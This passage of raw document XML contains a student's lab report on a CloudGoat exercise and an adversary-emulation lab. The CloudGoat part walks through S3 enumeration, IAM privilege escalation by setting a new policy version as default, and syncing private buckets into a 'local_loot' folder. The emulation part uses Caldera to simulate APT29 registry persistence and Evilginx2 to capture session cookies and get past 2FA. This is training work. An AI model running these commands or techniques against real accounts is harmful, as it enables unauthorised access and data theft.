        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the contents i found while enumerating and dumping the s3 bucket. It was very easy to setup since they provided with every step on how to setup the cloudgoat. URL -  “</w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://tryhackme.com/room/introductiontocloudgoat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">”. The commands I used to enumerate the bucket are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls –profile &lt;profile name&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” this will list all the buckets in the profile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have to check if a specific bucket is public “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://[bucket-name] --no-sign-request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">–no-sign-request flag tries to access the bucket without using any credentials. If it works, it’s public.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Asset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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Misconfiguration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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">AID001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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">S3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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Public read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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovered via “ls” with no-sign-request: contents viewable by anyone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalating Privileges and Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilized Pacu’s “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iam__privesec_scan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” module to identify a user with “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iam:CreateNewPlicyVersion</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” permissions. Exploited this by creating a new, unrestricted version of the existing IAM policy and setting it as the default. This effectively bypassed original limitations, elevating the account to Administrative status and granting full control over the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now after escalating privileges, we can access buckets that were previously restricted or those who were not public in a profile. Command to use here is: “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 sync s3://[private-bucket-name] ./local_loot –profile [your-escalated-profile]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” . Then confirm receipt by “</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls ./local_loot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">” this is used for local confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adversary Emulation Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adversary Emulation is a cybersecurity assessment method that replicates the tactics, techniques, and procedures (TTPs) of real-world threat actors to evaluate and improve an organization’s security defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Caldera - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it's a cybersecurity framework developed by MITRE that empowers cyber practitioners to save time, money, and energy through automated security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s an open-source, Ruby-based framework which contains a database of 1000+ exploits ready-to-use on a vulnerability.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evilginx2 - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It’s a man-in-the-middle reverse proxy framework. Unlike page clones, it proxies the real website which means it can bypass 2FA by capturing session cookies, not just passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulate APT29 phishing and persistence with Caldera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="6840000" cy="3022600"/>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68400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keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="151c2b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That;s the UI of caldera where we have to deploy an agent by going to campaigns &gt; agents &gt; deploy agent. In that we are gonna choose the default sandcat agent and deploy it. Next, we have to run APT29 operation by which Operations &gt; Create operation then select the adversary profile APT29 like custom like T1547.001 - Registry Run Keys. Finally Start the caldera and it will automatically executes commands on the Windows VM to establish persistence. Note - We have to copy and paste the powershell command and run it on the Windows VM or windows, i am using VM here for everything that’s why mentioning Windows VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="1077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94.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:gridCol w:w="2694.25"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.25"/>
            <w:gridCol w:w="2694.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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TTP</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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool 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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="151c2b"/>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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1566.001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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evilginx2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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Successfully bypassed 2FA; captured session cookies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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Caldera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51c2b"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:color w:val="151c2b"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated Registry run key injection via sandcat agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="151c2b"/>
        </w:rPr>
      </w:pPr>
